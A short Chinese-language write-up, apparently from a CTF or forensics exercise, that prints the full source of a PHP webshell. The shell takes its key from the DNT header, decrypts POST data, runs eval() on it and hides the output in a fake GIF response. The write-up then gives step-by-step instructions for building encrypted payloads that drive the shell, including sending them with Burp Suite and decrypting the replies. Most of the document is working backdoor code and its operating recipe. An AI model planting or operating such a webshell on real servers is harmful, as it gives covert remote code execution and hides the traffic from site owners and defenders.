先贴代码吧
<?php
$k = @$_SERVER["HTTP_DNT"];
$d = $p = '';
foreach ($_POST as $a => $b) $d.= $b;
$t = eccode($d, 'DECODE', $k);
$t = gzuncompress($t);
$p = unserialize($t);
$_POST = $p;
$_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1', base64_decode($_POST['z0'])));
ob_start();
$I1 = @$_POST['a'];
eval($I1);
$body = ob_get_contents();
ob_end_clean();
@header("Content-type: image/gif");
exit('GIF89a' . eccode(gzcompress($body) , 'ENCODE', $k));
function eccode($a, $b = 'DECODE', $c = 'Microsoft') {
$d = null;
if ($b == 'ENCODE') {
for ($e = 0; $e < strlen($a); $e++) {
$f = substr($a, $e, 1);
$g = substr($c, ($e % strlen($c)) - 1, 1);
$f = chr(ord($f) + ord($g));
$d.= $f;
}
$d = base64_encode($d);
$d = str_replace(array(
'+',
'/',
'='
) , array(
'-',
'_',
''
) , $d);
} elseif ($b == 'DECODE') {
$h = str_replace(array(
'-',
'_'
) , array(
'+',
'/'
) , $a);
$j = strlen($h) % 4;
if ($j) {
$h.= substr('====', $j);
}
$a = base64_decode($h);
for ($e = 0; $e < strlen($a); $e++) {
$f = substr($a, $e, 1);
$g = substr($c, ($e % strlen($c)) - 1, 1);
$f = chr(ord($f) - ord($g));
$d.= $f;
}
}
return $d;
}考虑到小马里本来就有encode和decode方法,就直接用小马来进行数据的加密,然后传入进行解密
$t = eccode($d, 'DECODE', $k);
$t = gzuncompress($t);
$p = unserialize($t);上面三行代码为解密顺序,在构造payload时从下往上,也就是下面这样
eccode(gzcompress(serialize($data)), 'ENCODE', $k);
然后再看
$_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1', base64_decode($_POST['z0'])));
...
$I1 = @$_POST['a'];post变量需要接受两个变量,a和z0,其中z0在下面并没有用到,但是需要匹配一下,这里构造数组进行序列化
eccode(gzcompress(serialize(array('a'=>'phpinfo();','z0'=>base64_encode(chr(2).'die();')))), 'ENCODE', $k);
这里的chr(2)是为了满足正则的(\W){1}部分
利用burpsuite发包
得到payload,然后post发到小马
得到加密后的数据,直接用小马解密即可得到返回结果